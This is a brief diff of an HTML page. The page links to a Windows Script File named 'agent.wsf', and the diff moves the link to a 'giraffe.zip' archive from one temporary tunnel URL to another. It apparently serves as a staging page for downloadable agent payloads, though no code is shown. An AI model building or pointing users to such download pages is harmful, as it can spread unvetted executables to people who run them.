--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://81e3-2a00-1370-8174-60f1-34ea-25f1-3dc1-8fe9.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://b55656e5-de3a-4d8a-92d3-fa8e838b77c1.tunnel4.com/agent/giraffe.zip">Giraffe</a>
     
